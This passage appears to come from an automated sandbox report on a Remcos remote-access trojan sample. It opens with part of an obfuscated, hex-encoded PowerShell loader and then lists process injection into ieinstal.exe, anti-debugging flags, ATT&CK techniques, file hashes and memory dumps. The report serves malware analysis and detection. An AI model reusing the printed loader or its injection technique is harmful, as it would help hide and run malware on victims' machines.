'DFD7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AAC9E5F6F7ECE5E8D9BEBEC7EBF4FDACA0C9E1EAEAE1F7A8A4B4A8A4A4A0C3E5E9E9E1B6B0BCB7A8A4B2B1B0AD';&($keenlya7) $Gothites0;$Pleskenen=$Mennes.count-654;$Gothites1 = samleve02 'DFD7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AAC9E5F6F7ECE5E8D9BEBEC7EBF4FDACA0C9E1EAEAE1F7A8A4B2B1B0A8A4A0CAF1E8F7F0EDE8E8E1A8A4A0D4E8E1F7EFE1EAE1EAAD';&($keenlya7) $Gothites1;$Gothites2 = samleve02 'A0C6F6FDE0F7EBE9E9E1F7A4B9A4DFD7FDF7F0E1E9AAD6F1EAF0EDE9E1AACDEAF0E1F6EBF4D7E1F6F2EDE7E1F7AAC9E5F6F7ECE5E8D9BEBEC3E1F0C0E1E8E1E3E5F0E1C2EBF6C2F1EAE7F0EDEBEAD4EBEDEAF0E1F6ACACE2EFF4A4A0D2E5EAE0A4A0CFF6FDE0ADA8A4ACC3C0D0A4C4ACDFCDEAF0D4F0F6D9A8A4DFCDEAF0D4F0F6D9A8A4DFCDEAF0D4F0F6D9A8A4DFCDEAF0D4F0F6D9A8A4DFCDEAF0D4F0F6D9ADA4ACDFCDEAF0D4F0F6D9ADADAD';&($keenlya7) $Gothites2;$Gothites3 = samleve02 'A0C6F6FDE0F7EBE9E9E1F7AACDEAF2EBEFE1ACA0C3E5E9E9E1B6B0BCB7A8A0CAF1E8F7F0EDE8E8E1A8A0C1EFF7F4E5A8B4A8B4AD';&($keenlya7) $Gothites3#"
3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
ceece8c5e0048892f21829333fd22b93

SHA1
c7c96f0d51bb5e83fba48eba0f2c5589be0b91d8

SHA256
6e1c0712dc39e8383eec8e2e5bb58cb4837671981ab10c5b13a6075317bd3ea6

SHA512
cedb21aa0f8b5b8e1c4c5b0b85be3e8e20f7dd2e627f553f93ff1a705d8d5777c3ad3fe0898a7f020c6aedc05bd34cebcca3cd6d61516d6eae1fbc3f8fd5ed65

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b2e7e08595846c5dbe58ad160f1b4c31

SHA1
a73988941ecb8af838682625eb1b5c8ab7a0b676

SHA256
d0b9c3c69a938acce53ddbb481e7c3751f4cb838f1ffd827a31a632ea8f40aff

SHA512
9362169ed2b44c07ece22bb6552fb04063853e0e96c8d0eb003d1397fbb7882584fcbe3846fe7bf872af69ea3562f424743e28768ec0a45fe05e38ad84b7d3de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab11B0.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF97C.tmp

Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1201.tmp

Filesize
161KB

MD5
73b4b714b42fc9a6aaefd0ae59adb009

SHA1
efdaffd5b0ad21913d22001d91bf6c19ecb4ac41

SHA256
c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd

SHA512
73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GMI1QX9JCZZ2YYNRVGU.temp

Filesize
7KB

MD5
035128ac76d866dc145ed0758e32d2c9

SHA1
70f40ca3102b41450c55e1d81cd390933aea015c

SHA256
a024feb8f190b59e6382af4fb6e03da6200409d46afff75118c528e9318bb136

SHA512
429f03187d7626e1cc126bc07aa6d0d7128d5e94b073eadee438c3669204c2d762cd0d40e9863980cb667ebd5f2231c4044059dd3ad087409604f98b7223a6ef

Download Submit
memory/1520-109-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-97-0x00000000022F0000-0x00000000022F8000-memory.dmp

Filesize
32KB

Download
memory/1520-101-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-96-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/1520-99-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-107-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-108-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-98-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-110-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1520-100-0x00000000025B0000-0x0000000002630000-memory.dmp

Filesize
512KB

Download
memory/1972-163-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-160-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-165-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-157-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-120-0x0000000000CA0000-0x0000000004FC7000-memory.dmp

Filesize
67.2MB

Download
memory/1972-154-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-168-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-171-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-144-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-148-0x0000000000CA0000-0x0000000004FC7000-memory.dmp

Filesize
67.2MB

Download
memory/1972-149-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1972-152-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1984-104-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download
memory/1984-117-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/1984-116-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download
memory/1984-115-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download
memory/1984-114-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download
memory/1984-113-0x0000000005A20000-0x0000000009D47000-memory.dmp

Filesize
67.2MB

Download
memory/1984-106-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download
memory/1984-105-0x00000000023E0000-0x0000000002420000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads